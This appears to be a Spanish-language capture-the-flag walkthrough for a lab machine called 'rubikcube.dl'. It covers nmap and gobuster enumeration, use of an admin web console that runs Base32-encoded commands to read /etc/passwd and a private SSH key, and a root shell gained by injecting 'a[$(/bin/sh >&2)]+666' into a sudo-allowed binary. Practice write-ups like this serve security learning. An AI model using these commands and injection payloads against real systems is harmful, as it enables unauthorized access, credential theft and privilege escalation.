# Enumeracion de Puertos, Servicios y Versiones

nmap -Pn -n -sS -p- -sV --script 'vuln' --min-rate 5000 -vvv 172.17.0.2 -oN nmap

22/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.58

al intentar conectarme por el navegador al servicio web del puerto 80 no se establece la conexion, 
pero la url indica http://rubikcube.dl/ asi que lo agregamos al archivo /etc/hosts

echo "172.17.0.2	rubikcube.dl" >> /etc/hosts

volvemos chequear y ya podemos ver la web levantada, reviso la web y el codigo fuente y no consigo nada
a primera vista, asi que ahora toca hacer fuzzing

# Fuzzing Web

gobuster dir -u http://rubikcube.dl/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,txt,html,py,js,png,jpg -b 404 > report-gobuster

         /.php                 (Status: 403) [Size: 277]
         /about.php            (Status: 200) [Size: 4181]
         /faq.php              (Status: 200) [Size: 7817]
         /img                  (Status: 301) [Size: 310] [--> http://rubikcube.dl/img/]
         /index.php            (Status: 200) [Size: 4327]
         /.html                (Status: 403) [Size: 277]
         /administration       (Status: 301) [Size: 321] [--> http://rubikcube.dl/administration/]
         /.html                (Status: 403) [Size: 277]
         /.php                 (Status: 403) [Size: 277]
         /server-status        (Status: 403) [Size: 277]
===========================================================================================================

tras chequear http://rubikcube.dl/administration/ nos conseguimos con un panel de administracion, tambien aparece
una tabla con 2 usuarios, probe diferentes configuraciones de los usuarios contra el servicio ssh pero de ninguna forma
funciono, revisando mas la web en la pestana de >> configuraciones << tenemos un apartado llamado: console
al clickcar sobre el nos direcciona a http://rubikcube.dl/myconsole.php, pero esta url no funciona (no existe)
asi que probamos acceder en http://rubikcube.dl/administration/myconsole.php y ahora si tenemos acceso a un nuevo panel
pero nos dice que: Ingrese el comando a ejecutar (codificado), por lo que despues de probar de varias formas, di que aceptaba
los comandos codificados en Base32, asi que vamos a intentar varias cosas:

===========================================
intentaremos leer el archivo /etc/passwd
asi que codificamos el comando y se lo pasamos

echo 'cat /etc/passwd' |base32
MNQXIIBPMV2GGL3QMFZXG53EBI======

le pasamos el comando codificado (MNQXIIBPMV2GGL3QMFZXG53EBI======) a la consola web
y logramos leer el archivo y nos conseguimos con los usuarios:

root:x:0:0:root:/root:/bin/bash
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
luisillo:x:1001:1001::/home/luisillo:/bin/sh

intente atacar el servicio ssh con hydra pero sin resultados

===========================================

echo 'ls -la' |base32
NRZSALLMMEFA====

se lo pasamos a la consola web y nos conseguimos con:

drwxr-xr-x 1 root root 4096 Aug 30 03:28 .
drwxr-xr-x 1 root root 4096 Aug 30 02:03 ..
-rwxr-xr-x 1 root root 3389 Aug 30 03:28 .id_rsa
-rw-r--r-- 1 root root 6665 Aug 30 01:34 configuration.php
drwxr-xr-x 2 root root 4096 Aug 30 00:23 img
-rw-r--r-- 1 root root 5460 Aug 30 01:22 index.php
-rw-r--r-- 1 root root 3509 Aug 30 01:52 myconsole.php
-rw-r--r-- 1 root root 1825 Aug 30 00:40 styles.css

interesante tener el .id_rsa y con permisos de lectura, asi que leemos el archivo
(codificamos el comando para leer el archivo)

echo 'cat .id_rsa' |base32
MNQXIIBONFSF64TTMEFA====

copiamos todo su contenido y creamos en nuestra maquina un archivo id_rsa con el mismo contenido

chmod go-rwx id_rsa			| configuramos los permisos
ssh -i id_rsa luisillo@172.17.02	| nos conectamos via ssh
/bin/bash	

# Escalada

sudo -l

User luisillo may run the following commands on 207a24f52253:
    (ALL) NOPASSWD: /bin/cube


ejecutamos el binario para ver como funciona
=======================================================================
sudo /bin/cube
Checker de Seguridad Por favor, introduzca un número para verificar:
Digite el número: 3



[!] Incorrecto

 La verificación ha sido completada.
=======================================================================

ok, por lo visto tiene pinta de : Bash eq Privilege Escalation

asi que volvemos ejecutar el binario y probamos

sudo /bin/cube
Checker de Seguridad Por favor, introduzca un número para verificar:
Digite el número: a[$(/bin/sh >&2)]+666

whoami
#root
